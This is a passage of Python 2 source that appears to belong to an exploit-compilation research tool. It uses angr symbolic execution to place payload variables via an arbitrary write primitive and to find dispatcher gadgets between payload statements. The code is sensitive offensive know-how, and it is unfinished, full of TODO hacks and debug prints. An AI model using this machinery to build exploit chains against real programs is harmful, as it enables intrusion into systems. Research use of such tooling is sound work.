#            self.__sim_mode = SIM_MODE_FUNCTIONAL
#        else:
#            self.__sim_mode = SIM_MODE_DISPATCH
        if state.inspect.instruction:
            insn_addr = state.inspect.instruction
        else:
            insn_addr = state.addr
        
        # get register name (no exceptions here)
        regnam = state.arch.register_names[ state.inspect.reg_write_offset ]
        if regnam in HARDWARE_REGISTERS:            # we don't care about all registers (rip, etc.)

            dbg_prnt(DBG_LVL_3, '\t0x%08x: %s = %s' % 
                        (insn_addr, regnam, state.inspect.reg_write_expr), pre='[r] ')


            # if simulation is in dispatch mode, check whether the modified register is immutable
            if self.__sim_mode == SIM_MODE_DISPATCH:

                # print 'IMM REGS', self.__imm_regs
                if regnam in self.__imm_regs:

                    # if the new value is the same with the old one, we're good :)

                    # we can concretize them as SPL registers always have integer values
                    oldval = state.se.eval(self.__getreg(regnam))
                    newval = state.se.eval(state.inspect.reg_write_expr)

                    # if value really changes (and it has changed in the past)
                    if oldval != newval and \
                        self.__getreg(regnam).shallow_repr() != self.__inireg[regnam].shallow_repr():
                        self.__disable_hooks = False

                        raise Exception("Attempted to write to immutable register '%s'" % regnam)

                    else:
                        print "immutable register '%s' overwritten with same value 0x%x" % (regnam, newval)


            # check whether symbolic variable persists after write
            if not self.__symv_in(state.inspect.reg_write_expr, self.__inireg[regnam]):
                if regnam not in self.__reg:        # if register is already concretized, skip it
                    # concretize register (after this point, its value will get lost)                
                    val = state.se.eval( self.__getreg(regnam, state) )


                    # if register is in the constraints, it should be part of the solution.
                    # But in any case we need the register to be in __reg, as its value is now
                    # lost, so we don't want any further register writes to be part of the
                    # solution.

                    if self.__in_constraints(self.__inireg[regnam], state):
                        self.__reg[ regnam ] = val

                        emph('Register found: %s = %x' % (regnam, val), DBG_LVL_2)
                    else:
                        # make it a tuple to distinguish the 2 cases
                        self.__reg[ regnam ] = (val,)


        self.__disable_hooks = False                # release "lock" (i.e., enable hooks again)


    # ---------------------------------------------------------------------------------------------
    # __dbg_call_hook(): This callback function is invoked when a function is invoked.
    #
    # :Arg state: Current state of the symbolic execution
    # :Ret: None.
    #
    def __dbg_call_hook( self, state ):
        if self.__disable_hooks:                    # if hooks are disabled, abort
            return

        # as in __dbg_read_hook(), we need mutual exclusion here as well
        self.__disable_hooks = True

        address = state.se.eval(state.inspect.function_address)
        name    = self.__proj.kb.functions[address].name

        # This function is called to solve a difficult problem: Crashes. 
        # TODO: elaborate.

        dbg_prnt(DBG_LVL_3, "\tCall to '%s' found." % name, pre='[C] ')

        # ---------------------------------------------------------------------
        # FILE *fopen(const char *path, const char *mode)
        # ---------------------------------------------------------------------
        if name == 'fopen':
            # print 'RDI', state.regs.rdi
            # print 'RSI', state.regs.rsi
            
            # if rdi is an expression then we may need to 

            # we work similarly with __mem_RSVPs, but our task here is simpler
            con_addr = state.se.eval(state.regs.rdi)
            # print 'ADDR', hex(con_addr)

            if 'W' not in self.__get_permissions(con_addr, state):
                self.__alloc_un(state, state.regs.rdi)
                #raise Exception("Attempted to write to an non-writable address '0x%x'" % addr)
        
            con_addr = state.se.eval(state.regs.rdi)
            # print 'ADDR', hex(con_addr)

            name = SYMBOLIC_FILENAME
          

            # if this address has already been written in the past, any writes will
            # be overwritten, so discard current path
            if con_addr in self.__mem or con_addr in self.__imm or (con_addr + 7) in self.__imm:
                raise Exception("Address 0x%x has already been written or it's immutable. "
                                "Discard current path." % con_addr)

            # write value byte-by-byte.
            for i in range(len(name)):
                self.__mwrite(state, con_addr + i, 1, name[i])
                self.__imm.add(con_addr + i)

            
            self.__inivar_rel[ con_addr ] = name
            self.__mem[ con_addr ] = 0
            dbg_prnt(DBG_LVL_2, "Writing call *0x%x = '%s'" % (con_addr, name))


        # ---------------------------------------------------------------------
        # int _IO_getc(_IO_FILE * __fp)
        #
        # TODO: Delete this code, or check for uninitialized FILE*
        # ---------------------------------------------------------------------
        elif name == '_IO_getc': 
            # print 'RDI', state.regs.rdi
            error('Oups!')   
            pass

        # ---------------------------------------------------------------------
        # TODO: Do the same for others open(), strcmp() (in wuftpd) and so on
        # ---------------------------------------------------------------------


        # ---------------------------------------------------------------------

        self.__disable_hooks = False                # release "lock" (i.e., enable hooks again)


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                         INTERNAL FUNCTIONS - MEMORY MANAGEMENT                          '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __get_var_values(): Get the values of an SPL variable (there can be >1)
    #
    # :Arg variable: The SPL variable
    # :Ret: The values of that variable.
    #
    def __get_var_values( self, variable ):
        # look for the declaration of "variable" (SPL compiler ensures it's uniqueness)
        for stmt in self.__IR:
            if stmt['type'] == 'varset' and stmt['name'] == variable:
                return stmt['val']

        # this should never be executed
        fatal("Searching for non-existing variable '%s'" % variable)


    # ---------------------------------------------------------------------------------------------
    # __pool_RSVP(): Reserve some address space in the pool, to store a variable.
    #
    # :Arg variable: The SPL variable
    # :Ret: The values of that variable.
    #
    def __pool_RSVP( self, variable ):        
        addr = POOLVAR_BASE_ADDR + self.__plsz      # make address pointing to the end of the pool
        

        self.__relative[ addr ] = '%s + 0x%03x' % (POOLVAR_NAME, self.__plsz)


        # reserve some space in the pool to hold variable's values (shift down self.__plsz)
        # (it's important as recursive calls in __init_variable_rcsv() can overwrite this space)
        #
        # NOTE: In current implementation, if there are >1 values, each of them has size 8.
        #       However we keep the code more general (i.e. independent of SPL compiler) so
        #       we don't use this observation.
        self.__plsz += sum(map(lambda v : len(v) if isinstance(v, str) else 8, 
                                self.__get_var_values(variable)))

        return addr                                 # return that address


    # ---------------------------------------------------------------------------------------------
    # __init_variable_rcsv(): Initialize a single SPL variable. This function writes the value(s)
    #       for that variable in memory. There are 2 types of variables. *Free* and *Register*.
    #       Free variables have no restrictions and therefore can be stored at any location (due
    #       to the AWP). Thus we reserve a "memory pool" somewhere in memory and we place all free
    #       variables there. Register variables are being passed to registers and therefore their
    #       address must be a valid (+RW) address that is being loaded to a register in a candidate
    #       block (they are usually on stack / heap).
    #
    #       SPL allows variables to get the address of another variable. That is, initializing a
    #       variable may require to initialize another variable first, and so on. Hence this
    #       function is recursive. For example consider the following variables (expressed in IR):
    #       
    #       {'type':'varset', 'uid':2, 'val':['aaa'],                                 'name':'aaa'}
    #       {'type':'varset', 'uid':4, 'val':['\x01\x00...\x00', ('aaa',)],           'name':'bbb'}
    #       {'type':'varset', 'uid':6, 'val':['\x02\x00...\x00', ('aaa',), ('bbb',)], 'name':'ccc'}
    #       {'type':'varset', 'uid':8, 'val':[('ccc',), '\x03\x00...\x00'],           'name':'ddd'}
    #
    #       Here initializing 'ddd', requires to initialize 'ccc' first and to initialize 'ccc' we
    #       have to initialize 'aaa' and 'bbb', but to initialize 'bbb' we have to also initialize
    #       'aaa'. The SPL compiler ensures that there not cycles.
    #
    # :Arg variable: The variable to initialize
    # :Ret: The address that the contents of this are stored.
    #
    def __init_variable_rcsv( self, variable, depth=0 ):
        dbg_prnt(DBG_LVL_3, "Initializing variable '%s' (depth: %d)" % (variable, depth))
        
        # ---------------------------------------------------------------------
        # Find the address for that variable
        # ---------------------------------------------------------------------       
        if variable in self.__vartab:               # register/used variable?
            addr = self.__vartab[ variable ]        # variable should be placed at a given location
            
            if addr in self.__inivar:               # if variable has already been initialized
                dbg_prnt(DBG_LVL_3, "'%s' is already initialized." % variable)
                return addr                         # just return it


            # addr can be a number, like 0x7ffffffffff01a0 or a string (dereference)
            # like "*<BV64 0x7ffffffffff0020>", or "*<BV64 rsi_713_64 + 0x18>".
            #
            # If the address gets dereferenced (*X), we store the values into the pool
            # and write pool's address into X (indirect) at runtime.
            if isinstance(addr, str):               # is addr a dereference?                
                addr = self.__pool_RSVP(variable)   # make address pointing to the pool                
                self.__vartab[ variable ] = addr    # and add it to the vartab

        else:
            # Variable is not in the vartab => Free. That is, variable can be stored
            # at any memory location, so we place it on the pool
            addr = self.__pool_RSVP(variable)
            self.__vartab[ variable ] = addr


        # ---------------------------------------------------------------------
        # Store the values to that address
        # ---------------------------------------------------------------------       
        orig_addr = addr                            # get a backup as address is being modified
        values    = ''                              # concatenated values
        relvals   = []                              # values in the relative form

        for val in self.__get_var_values(variable): # for each value

            if isinstance(val, tuple):
                # Value is a reference to another variable, Recursively initialize the
                # variable or get its address if it's already initialized. Recursion 
                # always halts, as SPL compiler ensures that variables aren't used before
                # they initialized so the following cases can't happen:
                #       int x = {&x};
                #       int a = {&b}; int b = 10; 

                # find the address for that variable and pack it
                address = self.__init_variable_rcsv( val[0], depth+1 )
                val     = struct.pack("<Q", address)

                relvals.append( address )           # relative value is an address

            else: 
                relvals.append( val )               # relative value is a string


            # at this point, value is a string (SPL compiler 'packs' integers)
           
            values += val

    
        # write value byte-by-byte. Memory address must be immutable;
        # any writes to it are not allowed
        for i in range(len(values)):
            self.__state.memory.store(addr + i, values[i])

            # check if it's already immutable
            if addr + i in self.__imm:
                raise Exception('Attempted to write an RSVP to an immutable address')


            self.__imm.add(addr + i)

        self.__inivar[ addr ] = values          # mark address as initialized        
        self.__inivar_rel[ addr ] = relvals     # values in the relative-form 

        addr += len(val)                        # and then shift index to the next value
        print 'INIVAR_REL:', hex(addr), relvals      

        dbg_prnt(DBG_LVL_3, "Done. '%s' has been initialized at 0x%x" % (variable, orig_addr))

        return orig_addr                            # return variable's original address
        

    # ---------------------------------------------------------------------------------------------
    # __init_vars(): Initialize the variables of the SPL payload. This function is essentially a
    #       wrapper of __init_variable_rcsv().
    #
    # :Arg varmap: The current variable mapping
    # :Ret: None.
    #
    def __init_vars( self, varmap ):
        dbg_prnt(DBG_LVL_2, 'Initializing SPL variables...')

        self.__vartab     = dict(varmap[:])         # create a dictionary out of varmap
        self.__plsz       = 0                       # our pool size
        self.__inivar     = { }                     # initialized memory locations 
        self.__inivar_rel = { }                     # values in the relative-form


        for var, addr in varmap:                    # for each SPL variable
            self.__init_variable_rcsv(var)          # recusively store it in memory 
                                                    # and update self.__vartab

        # ---------------------------------------------------------------------
        # Memory has been initialized. Print out variables (debugging only)
        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_2, 'Done. Pool Size: %s. Variable(s) memory layout:' % bold(self.__plsz))

        for addr, val in sorted(self.__inivar.iteritems()):
            dbg_prnt(DBG_LVL_2, '  %16x <- %s' % (addr, ' '.join(['%02x' % ord(v) for v in val])))
            
        # self.__vartab shows the address that each variable has been stored
        dbg_arb(DBG_LVL_3, 'Variable Table:', 
                                ['%s:0x%x' % (n,v) for n, v in self.__vartab.iteritems()])
        
        del self.__inivar                         # we don't need this guy anymore


    # ---------------------------------------------------------------------------------------------
    # __mem_RSVPs(): Initialize reserved memory locations that are being used as dereferences.
    #       This function is the continuation of __init_vars(). The problem here is that the
    #       address of an RSVP may change during the symbolic execution, or may be unknown until
    #       we reach the actual statement. For example:
    #
    #           UID:8       addr = [rsi + 10]
    #
    #       Here, rsi may be set at UID:6, so we don't know the address of [rsi + 10] and hence
    #       we cannot write a dereference, before we reach statement with UID:8. 
    #
    #       This function is invoked right before the execution of an accepted block and writes
    #       any dereferences "on the fly". We have to be careful though, as these addresses may
    #       be already written (we can't use AWP to set them at the beginning of the execution), 
    #       or marked as immutable. In both cases, reservation fails.
    #
    #
    # :Arg state: Current state of the symbolic execution    
    # :Arg cur_blk: Current basic block address
    # :Arg cur_uid: Current statement UID
    # :Ret: If reservation is successful, function returns True. If for some reason reservation 
    #       fails, False is returned.
    #
    def __mem_RSVPs( self, state, cur_blk, cur_uid ):
        dbg_prnt(DBG_LVL_2, "Applying memory RSVPs ...")

        # this is a static-style local variable
        if '_simulate__reserved_syms' not in self.__dict__:
            self.__reserved_syms = set()            # previous registers that were used in RSVPs


        # There's a problem when we concretize a symbolic variable that is already in 
        # __reserved_syms. For instance, if we set <BV64 rsi_713_64 + 0x30> at the 1st 
        # free slot of the pool, then <BV64 rsi_713_64 + 0x10> will point to a used area
        # in the pool. This memory has already been marked as immutable, so the reservation
        # will fail. To fix this, we "shift" the pool index to avoid these overlaps. Not a
        # perfect solution, but it works :)
        #
        # Although we can use a different memory area for that, we keep everything on the same
        # pool for simplicity.
        self.__plsz += POOLVAR_GRANULARITY

    
        self.__disable_hooks = True                 # disable hooks as we'll write to memory


        for blk, rsvp in self.__rsvp.iteritems():   # for each basic block reservation

            # check if it's the right time to do the reservation.
            #
            # (IMPORTANT) We can have >1 statements that use the same basic block, but the
            # current induced subgraph (Hk) might use only one statement from this block. 
            # So, we cannot make the reservations based just on block addresses. We have
            # to base our decisions on the UIDs as well, but then we can make one reservation
            # at a time. This is NOT an issue as long as Hk has multiple nodes that correspond
            # to the same basic block, so we'll have transitions from a block to itself.
            if blk != cur_blk:
                continue

            for (uid, addr, sym, val) in rsvp:      # for each statement reservation in this block         
                if uid != cur_uid:                  # check UID as well
                   continue


                print "RSVP ADDR',", addr, val

                
                reg = [r for v, r in self.__regmap if v == '__r%d' % self.__IR[uid]['reg']][0]


                self.unchecked_regsets.append( (reg, self.__IR[uid]['val']) )


                # If we have a double pointer, load variable's address from vartab (__init_vars() 
                # ensures that __vartab[val[0]] exists and is an valid integer address)                                
                if addr[0] == '*':                  
                    addr = addr[1:]                 # drop asterisk
                    val  = self.__vartab[ val[0] ]


                for leaf in STR2BV[addr].recursive_leaf_asts:
                    if leaf.shallow_repr() in SYM2ADDR:

                        print 'ADD contraint', leaf, hex(SYM2ADDR[leaf.shallow_repr() ][0])#, self.__mwrite(state, SYM2ADDR[leaf], 8, leaf)
                        #self.__state.add_constraints(leaf == self.__mwrite(state, SYM2ADDR[leaf], 8, leaf))
                        self.FOO.append(leaf)
                        self.__sym[ SYM2ADDR[leaf.shallow_repr() ][0] ] = leaf


                # check if address has dependencies on symbolic registers 
                # (e.g. <BV64 rsi_713_64 + 0x10>).
                #
                # Otherwise, address is constant so we directly write to that address.
                for reg, symreg in sym.iteritems(): # {'rsi': <BV64 rsi_713_64>} pairs

                    # if a register has already been used in a reservation, we don't add more
                    # constraints as we'll probably make it u n-satisfiable. For example, if
                    # we have the RSVPs <BV64 rsi_713_64 + 0x10> and <BV64 rsi_713_64 + 0x30>,
                    # we constrain rsi_713_64 only once.


                    if symreg not in self.__reserved_syms:
                        self.__reserved_syms.add( symreg )

                       # print 'add_constraints', symreg, STR2BV[addr]

                        # UPDATE: We may not need to add constraints. It's possible to already
                        #   have some constraints with addresses from the allocator, so when
                        #   we add pool addresses, we make them unsatisfiable. That is, we 
                        #   can implicitly have an address for a reservation outside of the pool.
                        #   For example:
                        #
                        #       <Bool mem_795_64 != 0x0>
                        #       <Bool (mem_795_64 + 0x10) == 0xd800100f>
                        #       <Bool mem_795_64 == r13_292906_64>
                        #
                        # If we now try to add the following constraint:
                        #       <Bool (r13_292906_64 + 0x38) == 0xca002028>
                        # 
                        # we'll make constraints unsatisfiable. Thus we don't have to add the
                        # last constraint, when has already a single solution


                        # The symbolic variable in symreg is different from this in state.regs.*.
                        # To deal with it, we add 2 constraints: 1st, we require that these two
                        # symbolic variables (symreg and state.regs.*) are equal and 2nd we 
                        # require that the symbolic address will point to an address on the pool.
                        state.add_constraints(self.__getreg(reg, state) == symreg)

                        state_copy = state.copy()                        

                        # this can be unsatisfiable. Try it on a copy of the state
                        x = state.se.BVS('x', 64)
                        
                        state_copy.add_constraints(x == POOLVAR_BASE_ADDR + self.__plsz)
                        state_copy.add_constraints(STR2BV[addr] == x)


                        print 'state.satisfiable():', state_copy.satisfiable(), state_copy.se.satisfiable()

                        if not state_copy.satisfiable():
                            dbg_prnt(DBG_LVL_2, "Reservation constraint was un-satisfiable. Rolling back...")

                            del state_copy
                        else:
                            # constraint ok. add it to the real state
                            x = state.se.BVS('x', 64)
                        
                            state.add_constraints(x == POOLVAR_BASE_ADDR + self.__plsz)
                            state.add_constraints(STR2BV[addr] == x)

                            # TODO: comment!
                            self.__relative[POOLVAR_BASE_ADDR + self.__plsz] = \
                                                                '$pool + 0x%03x' % self.__plsz

                            self.__plsz += 8            # update pool

                            del state_copy


                # print 'FINAL CONSTRAINTS', state.se.constraints

                try:
                    # 'addr' is string with a symbolic expression. Convert it back to bitvector
                    # and concretize it
                    con_addr = state.se.eval(STR2BV[addr])

                    print 'con_addr', hex(con_addr)

                    # The stack address in the basic block is different from the one in the
                    # current path. So readjust it (TODO: Do it in a less sloppy way)
                    # TODO: !!!!!!!
                    if abs(con_addr - RSP_BASE_ADDR) < 0x1000:
                        con_addr = (con_addr - RSP_BASE_ADDR) + state.se.eval(state.regs.rsp)
                        print 'CON', state.regs.rsp, hex(state.se.eval(state.regs.rsp))
                        print 'CONCON', hex(con_addr)
                        #  exit()


                    # -------------------------------------------------------------------------
                    # RSVPs like this: '<BV64 Reverse(stack_9618_262144[258175:258112]) + 0x18>'
                    #       get concretized to 0x18, so make sure that before you concretize
                    #       it's a +W memory
                    #
                    # Update: We miss solutions here. Instead of discarding them, initialize them
                    # somewhere __alloc_un
                    #
                    writable = True
                    in_section = False
                    try:                    
                        for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():
                            if sec.contains_addr(con_addr):
                                print 'sec.is_writable', sec.is_writable
                                writable &= sec.is_writable
                                in_section = True
                        
                        if not in_section:
                            rwx = state.memory.permissions(con_addr)
                            print 'rwx', rwx
                            if state.se.eval(rwx) & 2 == 2:
                                writable = True
                            else:
                                writable = False                                
                    except Exception, e:
                        writable = False                        
                    # -------------------------------------------------------------------------

                    if writable == False:
                        warn("RSVP concretized but it has an invalid address '0x%x'" % con_addr)
                        # return False

                        # give it a second chance
                        self.__alloc_un(state, STR2BV[addr])
                        
                        con_addr = state.se.eval(STR2BV[addr])


                except angr.errors.SimUnsatError:   # un-satisfiable constraints
                    dbg_prnt(DBG_LVL_2, "Reservation was un-satisfiable. Discard current path.")
                    print 'SSSSS', self.__state.se.constraints
                    return False                    # reservation failed
                
                except Exception, e:
                    dbg_prnt(DBG_LVL_2, "Unknown Exception '%s'. Discard current path." % str(e))
                    return False                    # reservation failed


                # if this address has already been written in the past, any writes will
                # be overwritten, so discard current path                
                #if con_addr in self.__mem or con_addr in self.__imm or (con_addr + 7) in self.__imm:
                if con_addr in self.__imm or (con_addr + 7) in self.__imm:
                    dbg_prnt(DBG_LVL_2, "RSVP 0x%x has already been written or it's immutable. "
                                        "Discard current path." % con_addr)

                    return False                    # reservation failed


                # write value byte-by-byte. Memory address must also be immutable
                p_val = struct.pack("<Q", val)

                # print 'WRITING:', hex(val), 'at ', hex(con_addr)

                # this was problematic (endianess was fucked up)
                # self.__mwrite(state, con_addr, 8, p_val)
                

                # before you write the value, check if the contents of this address are already
                # in the contraints
                symv = self.__mread(state, con_addr, 8)
                print 'PRIOR VALUE at', hex(con_addr), '::', symv
                if self.__in_constraints(symv) or [V for V in self.__inireg.values() if V.shallow_repr() == symv.shallow_repr()]:
                    dbg_prnt(DBG_LVL_2, "RSVP already in constraints!")
                else:
                    symv = None


                for i in range(8):                    
                    state.memory.store(con_addr + i, p_val[i])
                    self.__imm.add(con_addr + i)    # mark immutable addresses at byte granularity


                # add reservation to memory
                self.__mem[ con_addr ] = (val, 8)

                dbg_prnt(DBG_LVL_2, "Writing RSVP *0x%x = 0x%x" % (con_addr, val))

                if symv != None:
                    # add the new contraint
                    state.add_constraints(symv == val)

                    if not state.satisfiable():
                        dbg_prnt(DBG_LVL_2, "RSVP caused constraints to be unsatisfiable. Discard Path")
                        return False

               # print '$$$$$$$$$$$$$$$$$$$$$$$$$', self.__mread(state, con_addr, 8)

        # print 'FINITO MEM_RSVPz', state.satisfiable(), state.se.satisfiable()
        # print 'CONSTRAINTS', state.se.constraints
        
        self.__disable_hooks = False                # enable hooks again

        return True                                 # reservation was successful


    # ---------------------------------------------------------------------------------------------
 
    ''' ======================================================================================= '''
    '''                          INTERNAL FUNCTIONS - TRACE MANAGEMENT                          '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __simulate_subpath(): This internal function performs the actual symbolic execution, for
    #       the candidate subpath. It guides symbolic execution through the specific subpath.
    #
    # :Arg sublen: The length of the subpath
    # :Arg subpath: The actual subpath
    # :Arg mode: The simluation mode for each step
    # :Ret: If the subpath can be simulated successfully, function returns the new state for the
    #       symbolic execution. Otherwise, function returns None.
    #
    def __simulate_subpath( self, sublen, subpath, mode ):
        emph("Trying subpath (%d): %s" % (sublen, 
                        ' -> '.join(['0x%x' % p for p in subpath])), DBG_LVL_2)
   
 
        self.__disable_hooks = False                # enable hooks

        # Register the signal function handler
        signal.signal(signal.SIGALRM, self.__sig_handler)

        # clone current state (so we can revert if subpath extension fails)
        self.stash_context()

        state = self.__state.copy()

        # create hte simulation manager object
        simgr = self.__proj.factory.simulation_manager(thing=state)
        # angr.manager.l.setLevel(logging.ERROR)
        

        found = simgr.active[0]                     # a.k.a. state
        
        dbg_arb(DBG_LVL_3, "BEFORE Constraints: ", found.se.constraints)

        # guide the symbolic execution: move from basic block to basic block
        for blk in subpath[1:]:
            simgr.drop(stash='errored')             # drop errored stashes
            signal.alarm(SE_TRACE_TIMEOUT)          # define a timeout for the SE engine


            self.__sim_mode = mode.pop(0)

            try:
                dbg_prnt(DBG_LVL_3, "Next basic block: 0x%x" % blk)
                # simgr.explore(find=blk)             # try to move on the next block
                # simgr.step()


                node = ADDR2NODE[found.addr]
                # print 'NODE ', node, len(node.instruction_addrs)

                num_inst = len(node.instruction_addrs) if node is not None else None
                if num_inst:
                    simgr.step(num_inst=num_inst)

                else:
                    NEW = simgr.step()
                    # print 'NEW', NEW, NEW.errored


            except Exception, msg:                   
                dbg_prnt(DBG_LVL_3, "Subpath failed. Exception raised: '%s'" % bolds(str(msg)))
                found = None                        # nothing found
                break                               # abort

            signal.alarm(0)                         # disable alarm

            if not simgr.active:
                # print 'Stashes', simgr.stashes
                dbg_arb(DBG_LVL_3, "Constraints: ", found.se.constraints)

                dbg_prnt(DBG_LVL_3, "Subpath failed (No 'active' stashes)")
                found = None                        # nothing found
                break                               # abort
        
    
            #print 'Stashes', simgr.stashes

            found = None                     # nothing found

            # print 'Stashes', simgr.stashes            
            # print 'state.satisfiable():', simgr.active[0].satisfiable()

            # drop any active stashes and make found stashes, active so you
            # can continue the search           
            simgr.move(from_stash='active', to_stash='found', \
                            filter_func=lambda s: s.addr == blk)
            
            simgr.drop(stash='active')
            simgr.move(from_stash='found', to_stash='active')
                    
            
            if simgr.active:
                found = simgr.active[0]             # TODO: Shall we use .copy() here?

                dbg_prnt(DBG_LVL_3, "Block 0x%x found!" % blk)
                dbg_arb(DBG_LVL_3, "Constraints: ", found.se.constraints)
                
            # print 'FOUND IS ', found
            # self.__sim_mode = SIM_MODE_DISPATCH
            

        if not found:                               # if nothing found, drop cloned state
            print 'Stashes', simgr.stashes

            self.unstash_context()
            del state
        else:            
            self.drop_context_stash()
            dbg_prnt(DBG_LVL_3, "Subpath simulated successfully!")

        signal.alarm(0)                             # disable alarm

        self.__disable_hooks = True                 # hooks should be disabled        

        return found                                # return state (if any)


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Create and initialize a blank state and prepare the
    #       environment for the symbolic execution.
    #
    # :Arg project: Instance of angr project
    # :Arg cfg: Binary's CFG
    # :Arg clobbering: Dictionary of clobbering blocks
    # :Arg adj: The SPL adjacency list
    # :Arg IR: SPL's Intermediate Representation (IR)
    # :Arg varmap: The register mapping
    # :Arg regmap: The variable mapping
    # :Arg rsvp: The reserved memory addresses for variables
    # :Arg entry: Payload's entry point
    #
    def __init__( self, project, cfg, clobbering, adj, IR, regmap, varmap, rsvp, entry ):
        self.__proj = project                       # store arguments internally
        self.__cfg  = cfg
        self.__IR   = IR
        self.__rsvp = rsvp
        self.__regmap = regmap

        self.__imm    = set()                       # immutable addresses
        self.__sym    = { }                         # symbolic variables
        self.__inireg = { }                         # initial register symbolic variables

        self.__reg = { }                            # final output for registers,
        self.__mem = { }                            # memory and
        self.__ext = { }                            # external data (from files, sockets, etc.)


        # 0xca00013b is actually pool_base + 0x13b
        self.__relative = { }
        
        self.condreg = ''
        # regsets that are not checked after block execution
        self.unchecked_regsets = []

        # even though we avoid all clobbering blocks from our path, this doesn't mean that
        # registers may not get clobbered. This usally happens inside system or library calls
        # where registers are being changed, even though there are no clobbering blocks.
        # 
        # to deal with it, we simply mark a register as immutable after 
        #
        # all register that used by SPL are immutable (only functional blocks can modify them)
        #        
        self.__imm_regs = set()                     # initially empty; add registers on the fly
        #self.__imm_regs = set([real for _, real in regmap])

        self.__sim_mode = SIM_MODE_INVALID

        self.FOO = []

#        print 'RSVPs', 
#        for addr, x in sorted(rsvp.iteritems()):
#            print hex(addr), x


        # the base adress that uninitialized symbolic variables should be allocated 
        # don't start form 0 to catch allocations that start BEFORE the initial (.e.g. if 
        # [rax + 0x20] = ALLOC, then rax will be below allocator)
        self.__alloc_size = 0x100          
        
        # create a CFG shortest path object
        self.__cfg_sp = path._cfg_shortest_path(self.__cfg, clobbering, adj)

        # create a symbolic execution state
        self.__state = self.__proj.factory.call_state(
                                    mode       = 'symbolic', 
                                    addr       = entry, 
                                    stack_base = STACK_BASE_ADDR, 
                                    stack_size = 0x10000
                        )


        # initialize all registers with a symbolic variable
        self.__state.regs.rax = self.__state.se.BVS("rax", 64)
        self.__state.regs.rbx = self.__state.se.BVS("rbx", 64)
        self.__state.regs.rcx = self.__state.se.BVS("rcx", 64)
        self.__state.regs.rdx = self.__state.se.BVS("rdx", 64)
        self.__state.regs.rsi = self.__state.se.BVS("rsi", 64)
        self.__state.regs.rdi = self.__state.se.BVS("rdi", 64)
        
        # rsp must be concrete and properly initialized
        self.__state.registers.store('rsp', RSP_BASE_ADDR, size=8)

        # rbp may also needed as it's mostly used to access local variables (e.g., 
        # rax = [rbp-0x40]) but some binaries don't use rbp and all references are
        # rsp related. In these cases it may worth to use rbp as well.
        if MAKE_RBP_SYMBOLIC:
            self.__state.regs.rbp = self.__state.se.BVS("rbp", 64)
        else:
            self.__state.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8)        

        self.__state.regs.r8  = self.__state.se.BVS("r08", 64)
        self.__state.regs.r9  = self.__state.se.BVS("r09", 64)
        self.__state.regs.r10 = self.__state.se.BVS("r10", 64)
        self.__state.regs.r11 = self.__state.se.BVS("r11", 64)
        self.__state.regs.r12 = self.__state.se.BVS("r12", 64)
        self.__state.regs.r13 = self.__state.se.BVS("r13", 64)
        self.__state.regs.r14 = self.__state.se.BVS("r14", 64)
        self.__state.regs.r15 = self.__state.se.BVS("r15", 64)


        # remember the initial symbolic variables for the registers
        self.__inireg = { r : self.__getreg(r) for r in HARDWARE_REGISTERS }


        # initialize SPL variables        
        self.__init_vars( varmap )  # this can trhow an exception
      

        # An alternative way to enable/disable hooks is this:
        #       s = state.inspect.b('mem_write', ...)
        #       s.enabled = False
        self.__disable_hooks = False                # enable breakpoints 
       
        self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )
        self.__state.inspect.b('mem_read',  when=angr.BP_BEFORE, action=self.__dbg_read_hook  )  
        self.__state.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__dbg_reg_wr_hook)
        self.__state.inspect.b('symbolic_variable', 
                                            when=angr.BP_AFTER,  action=self.__dbg_symv_hook  )
        self.__state.inspect.b('call',      when=angr.BP_AFTER, action=self.__dbg_call_hook   )
        

        self.__origst = self.__state.copy()         # create a copy of the original state


        # deep copy 
        self.imm           = self.__imm
        self.sym           = self.__sym
        self.inireg        = self.__inireg
        self.reg           = self.__reg
        self.mem           = self.__mem
        self.ext           = self.__ext
        self.relative      = self.__relative
        self.imm_regs      = self.__imm_regs
        self.alloc_size    = self.__alloc_size
        self.state         = self.__state        
        self.disable_hooks = self.__disable_hooks = False                # enable breakpoints         


        self.project    = project
        self.cfg        = cfg
        self.clobbering = clobbering
        self.adj        = adj
        self.IR         = IR
        self.regmap     = regmap
        self.varmap     = varmap
        self.rsvp       = rsvp
        self.entry      = entry


    # ---------------------------------------------------------------------------------------------
    # __check_regsets(): TODO:
    #
    # Some RSVPs have weird addresses that we can't even concretize right before the block execution:
    #   <Bool (Reverse(symbolic_read_unconstrained_277383_64) + (r13_277379_64 << 0x3)) == x_472_64>
    #
    # This means that our reservation will be wrong and the register will never be assigned to the
    # right value. A quick patch here, is to check whether register gets concretized to the right
    # value after the block execution and if not we add the desired constraint
    #
    # <Bool (0#32 .. (mem_d8003100_481_64[31:0] & 0xf8000000)) != 0x30000000>]
    #
    def __check_regsets( self, state=None ):
        if not state:
            state = self.__state

        # print '^^^^^^^^^^^^^^', self.unchecked_regsets


        for reg, val in self.unchecked_regsets:
            if isinstance(val, tuple):
                pass
                warn('Oups!')

            else:
                if state.se.eval( self.__getreg(reg, state) ) != val:
                    
                    warn('Wrong concretized value! Fixing it.... %x != %x' %                        
                            (state.se.eval( self.__getreg(reg, state) ), val))

                    # print '-----------> ',  reg, self.__getreg(reg, state)
                    state.add_constraints(self.__getreg(reg, state) == val)

                    if not state.satisfiable():
                        dbg_prnt(DBG_LVL_2, "Reservation constraint was un-satisfiable. Rolling back...")

                        self.unchecked_regsets = [] # all registers are checked!
                        return False                # check failed

        pass

        self.unchecked_regsets = []                 # all registers are checked!

        return True


    # ---------------------------------------------------------------------------------------------
    # simulate_edge(): This function is invoked for every edge in the induced subgraph Hk and it
    #       performs a symbolic execution from one accepted block to another. Essentially, its
    #       purpose is to find a "dispatcher gadget" (i.e., a sequence of non-clobbering blocks)
    #       between two SPL statements.
    #
    #       Unfortunately, the symbolic execution engine, may take forever to move from the one
    #       accepted block to the other To address this issue, we "guide" the symbolic execution,
